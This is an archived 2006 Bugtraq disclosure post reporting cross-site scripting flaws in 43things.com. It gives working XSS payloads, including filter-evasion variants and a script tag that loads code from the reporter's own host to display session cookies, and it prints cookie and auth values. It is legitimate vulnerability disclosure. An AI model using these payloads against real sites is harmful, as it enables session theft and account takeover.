lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 14 Jun 2006 08:51:14 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: 43things.com - XSS with cookie disclosure


43things.com

Homepage:
http://www.43things.com

Affected files:
input box "I want to add to my list"
posting a comment

----------------------------------------

XSS vuln via input text of the box "I want to____"

When you add an item thats already on your list. 

For a PoC we have style tags with broken up javascript. Put thisitem in your list once, and then using the "I want to:" put it again:

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

Screenshots:
http://www.youfucktard.com/xsp/43things1.jpg


Now, in the same box even with no filter evasion we can even show our cookie. try putting:

<script src=http://www.youfucktard.com/xss.js></script>

And then, once again, like above, try putting it again in the same box.

Our cookie:

"This is remote text via xss.js located at youfucktard.com auth=7k5BtRfaYdbOdaaD%2BrHb8JGnJkroqKA2fR2Txs%2BO8BpvcxoRbeAe%2Bp3JZs2fhO7wu4IpF6ofcq1dROtVuHwTiQFkMV3U7pl%2FmcmA4ICJmLk%3D; ubid=4G%2BZUgL4cQNV0JT1ixHx5obNSs0%3D; _session_id=837ecebc52b1d47edd9c65e29a945de8; AWSUSER_ID=awsuser_id1150241074938r6320; AWSSESSION_ID=awssession_id1150241074938r6320"

Screenshots:
http://www.youfucktard.com/xsp/43things2.jpg

--------------------------------------

XSS via posting a comment.

Data here isn't properally sanatized here before being generated. We see that even with no filtering we can insert something like:
<IMG SRC=javascript:alert('XSS')>

and it will create our xss example. 

Screenshot3:
http://www.youfucktard.com/xsp/43things3.jpg

However, it wont actually insert the comment, it will just execute it. So to bypass "malformed html found" error msg, we will use the numerial refference of <> which is &lt; and &gt;, along with double beginning and ending tags. For a PoC tryputting the code below as a comment:

&lt;<<IMG SRC=javascript:alert('We%20Bypassed%20the%20filter!')>>&gt;

Screenshots:
http://www.youfucktard.com/xsp/43things4.jpg

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ